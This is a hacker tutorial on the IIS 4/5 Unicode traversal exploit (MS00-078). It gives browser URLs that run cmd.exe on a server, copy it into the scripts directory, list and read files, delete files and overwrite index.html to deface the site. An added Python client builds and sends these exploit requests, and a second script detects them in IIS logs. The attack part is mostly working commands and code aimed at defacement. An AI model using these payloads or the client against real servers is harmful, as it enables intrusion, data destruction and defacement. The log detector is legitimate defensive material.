UNICODE EXPLOIT IIS 4 + 5
________________________________


18-4-01 = This tutorial has been written by THxZ0NE a.k.a THxZ a.k.a |THxZ0NE|
Do not change this tutorial without permission from me.
For questions mail to:
Contact
Secure Logics


--------------------------------------------------------------------------------
The subject of this tutorial is the Unicode exploit for IIS 4 and 5. IIS checks the
requested path for ".." before it decodes it, and only afterwards decodes %c0%af (an
overlong UTF-8 encoding of "/"), so a request through an executable directory such as
/scripts/ can walk out of the web root and run winnt\system32\cmd.exe under the account
IIS uses for anonymous requests. Microsoft patched it in bulletin MS00-078 (October 2000).
NOTE: You can use unicodexecute2.pl together with ActivePerl, or just your web browser.
----------------------------------------------------------------------------------

If you use Windows, Grinder is a handy program for scanning for web servers.

-----------------------------------------------------------------------------------
- All right, let's begin.

- The IP address we use in this example is 127.0.0.1.

------------------------------------------------------------------------------------

1 ...... 127.0.0.1 must be vulnerable to the exploit.

So we type this command in our web browser:

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:

When you see the directory listing of drive c: (the output of "dir"), the server is
vulnerable. A patched server does not run cmd.exe at all and sends back an HTTP error
page instead of command output.

Next check that the directory c:\Inetpub\wwwroot exists. You do that like this:

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:\Inetpub\wwwroot

and that c:\winnt\system32 exists:

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:\winnt\system32

-------------------------------------------------------------------------------------

2........ Then you must copy cmd.exe from c:\winnt\system32 to c:\Inetpub\scripts.

You do that with the following command (%20 is an encoded space, the same as "+"):

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+copy+c:\winnt\system32\cmd.exe%20c:\Inetpub\scripts\cmds.exe

When the Inetpub\scripts directory is on another drive, for example e:, you must type:

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+copy+c:\winnt\system32\cmd.exe%20e:\Inetpub\scripts\cmds.exe

A successful copy answers with "1 file(s) copied." Step 4 uses this copy (cmds.exe)
for the command with output redirection, so from here on you can run what you want.

But when you get the message "Access is denied", the copy did not happen: cmd.exe ran,
but the account IIS runs anonymous requests under has no write permission on the
scripts directory. That is an NTFS permission, not the patch; a patched server would
not have returned any cmd.exe output in step 1. Then you have to take another one.

-----------------------------------------------------------------------------------------

3...... Now you have to go to the directory where the page is.

When Inetpub\wwwroot is on c: you type this:

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:\Inetpub\wwwroot

or on e:

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+e:\Inetpub\wwwroot

-----------------------------------------------------------------------------------------

4...... When you see the HTML file you want to deface, for example index.html,
you type this (note that it uses the copied cmds.exe from step 2):

http://127.0.0.1/scripts/cmds.exe?+/c+echo+YOUR TEXT+>+c:\Inetpub\wwwroot\index.html

This writes the single line "YOUR TEXT" into index.html, replacing the file.

When you open your browser and type

http://127.0.0.1

you will see your line instead of the web page :)))

And you are ready!! But don't change too much...

And send an email to the webmaster that he must update his server (the fix is the
MS00-078 patch).
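The four steps above as a small Python client, added here as an example; it is not code from the original tutorial and not unicodexecute2.pl. It builds the same traversal URLs the tutorial types into a browser and classifies the reply from the strings cmd.exe itself prints ("Directory of", "1 file(s) copied.", "Access is denied"), so the "is it vulnerable?" decision is not made by eye. The host 127.0.0.1 and the renamed copy cmds.exe are the tutorial's; nothing is sent unless send_command() is called against a live host.

```python
"""Client for the IIS 4/5 Unicode traversal requests used in steps 1 to 4.

Added example: the URL layout is the tutorial's, the classification strings
are what cmd.exe prints, and the host/port defaults are assumptions.
"""
import urllib.error
import urllib.parse
import urllib.request

# /scripts/ is an IIS executable directory; "..%c0%af.." is ".." followed by
# the overlong UTF-8 encoding of "/", which unpatched IIS 4/5 decodes only
# after its traversal check, so the request escapes the web root to cmd.exe.
TRAVERSAL_EXE = "/scripts/..%c0%af../winnt/system32/cmd.exe"


def build_url(host, command, exe=TRAVERSAL_EXE, port=80):
    """Return the URL that runs `command` as "cmd.exe /c <command>".

    Spaces become '+' as in the tutorial; ':', '\\' and '>' are left raw
    because the tutorial's own URLs rely on them.
    """
    query = "/c+" + urllib.parse.quote(command.replace(" ", "+"), safe="+:\\>/.")
    return "http://%s:%d%s?%s" % (host, port, exe, query)


def classify(status, body):
    """Map an HTTP status and body to what the tutorial reads off the screen.

    cmd.exe output comes back as the body of a 200 reply; IIS answers with
    an error status when it did not run cmd.exe (patched server, or no
    /scripts/ directory), so a non-200 reply is never "vulnerable".
    """
    if status != 200:
        return "not exploitable (HTTP %d reply, no cmd.exe output)" % status
    if "Access is denied" in body:
        return "cmd.exe ran, but the web server account lacks permission"
    if "Directory of" in body or "Volume in drive" in body:
        return "vulnerable (dir output returned)"
    if "file(s) copied" in body:
        return "copy succeeded"
    return "cmd.exe ran; output: " + body.strip()[:80]


def send_command(host, command, exe=TRAVERSAL_EXE, port=80, timeout=10):
    """Send one command to a live host and return (status, body).

    HTTP error replies are returned rather than raised so classify() sees them.
    """
    url = build_url(host, command, exe, port)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("latin-1")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("latin-1")


def procedure(host, text, drive="c:"):
    """The four requests of steps 1 to 4, in order, as (description, URL).

    `drive` is where Inetpub lives (the tutorial shows c: and e:).
    """
    copied = "/scripts/cmds.exe"  # the renamed copy made in step 2
    return [
        ("1. is it vulnerable?", build_url(host, "dir " + drive)),
        ("2. copy cmd.exe into /scripts",
         build_url(host, "copy %s\\winnt\\system32\\cmd.exe %s\\Inetpub\\scripts\\cmds.exe"
                   % (drive, drive))),
        ("3. list the web root", build_url(host, "dir %s\\Inetpub\\wwwroot" % drive)),
        ("4. overwrite index.html",
         build_url(host, "echo %s > %s\\Inetpub\\wwwroot\\index.html" % (text, drive),
                   exe=copied)),
    ]


if __name__ == "__main__":
    for label, url in procedure("127.0.0.1", "YOUR TEXT"):
        print(label, url)
```

Run it as-is to print the four URLs; to go live, pass each command to send_command() and hand the (status, body) pair to classify(), stopping as soon as step 1 does not come back "vulnerable".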

-------------------------------------------------------------------------------------------

You can also do other things, like make a directory:

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+mkdir+0wn3D_By_THxZ0NE

------------ Or when you want to look at drive d:, e: or f:,

you type this:


http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+d:

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+e:

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+f:


-------------
Display a text file, for example zone.txt on drive c:

http://IP/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+type+c:\zone.txt
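The check on the other side of the advice to tell the webmaster to update the server, added here as an example that is not part of the original tutorial: a scan over IIS W3C-format log lines that flags the requests this tutorial produces. It decodes the percent-encoded path and reports any overlong two-byte UTF-8 sequence (lead byte C0 or C1) that hides a "/" or "\" (%c0%af and %c1%9c are the two the traversal uses), and it also flags "/c+..." queries to an .exe such as the copied cmds.exe, which carries no Unicode at all. The log excerpt is constructed for the example and lists only the fields used here; the last line shows the same request answered with 404, which is what an attempt against a patched server looks like.

```python
"""Detect IIS 4/5 Unicode traversal attempts in W3C extended log lines.

Added example: the log excerpt below is constructed; the field names follow
the #Fields: header IIS writes, trimmed to the ones this script needs.
"""
from urllib.parse import unquote_to_bytes

SAMPLE_LOG = r"""
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-04-18 10:22:31 10.0.0.5 GET /default.htm - 200
2001-04-18 10:22:40 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c: 200
2001-04-18 10:22:55 10.0.0.5 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\Inetpub\scripts\cmds.exe 200
2001-04-18 10:23:10 10.0.0.5 GET /scripts/cmds.exe /c+echo+YOUR+TEXT+>+c:\Inetpub\wwwroot\index.html 200
2001-04-18 10:23:30 10.0.0.6 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c: 404
"""


def overlong_chars(raw_path):
    """Return the characters hidden in overlong two-byte UTF-8 sequences
    of a percent-encoded path (empty list if there are none).

    A lead byte of C0 or C1 can only encode code points below 0x80, which a
    conforming UTF-8 decoder rejects; IIS 4/5 before MS00-078 decoded them,
    and did so after its ".." check, which is the whole bug.
    """
    data = unquote_to_bytes(raw_path)
    found = []
    for lead, cont in zip(data, data[1:]):
        if lead in (0xC0, 0xC1) and 0x80 <= cont <= 0xBF:
            found.append(chr(((lead & 0x1F) << 6) | (cont & 0x3F)))
    return found


def parse_iis_log(text):
    """Yield one dict per request line, keyed by the names in #Fields:."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def find_traversal(text):
    """Return (time, client ip, status, reason) for each suspicious request.

    Both the Unicode traversal itself and the follow-up use of a cmd.exe copy
    in a script directory are reported; the status tells whether IIS actually
    ran the command (200) or refused the path (e.g. 404 on a patched server).
    """
    hits = []
    for rec in parse_iis_log(text):
        stem, query = rec["cs-uri-stem"], rec["cs-uri-query"]
        if any(ch in "/\\" for ch in overlong_chars(stem)):
            reason = "overlong UTF-8 path separator in %s" % stem
        elif stem.lower().endswith(".exe") and query.lower().lstrip("+").startswith("/c+"):
            reason = "cmd.exe-style '/c' command to %s" % stem
        else:
            continue
        hits.append((rec["time"], rec["c-ip"], rec["sc-status"], reason))
    return hits


if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(*hit)
```

The decoder deliberately does not match the literal strings %c0%af and %c1%9c: any C0/C1 lead byte that decodes to a path separator is flagged, so case differences and the other overlong spellings of the same two characters are caught as well.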





_________________________________________
- Some commands

echo: writes text into a file on the server (the only kind of "upload" you get this way)

dir+c: lists the files on drive c:
del+c:\thxzone.txt deletes the file thxzone.txt on drive c:


    Source: geocities.com/eljehad1/se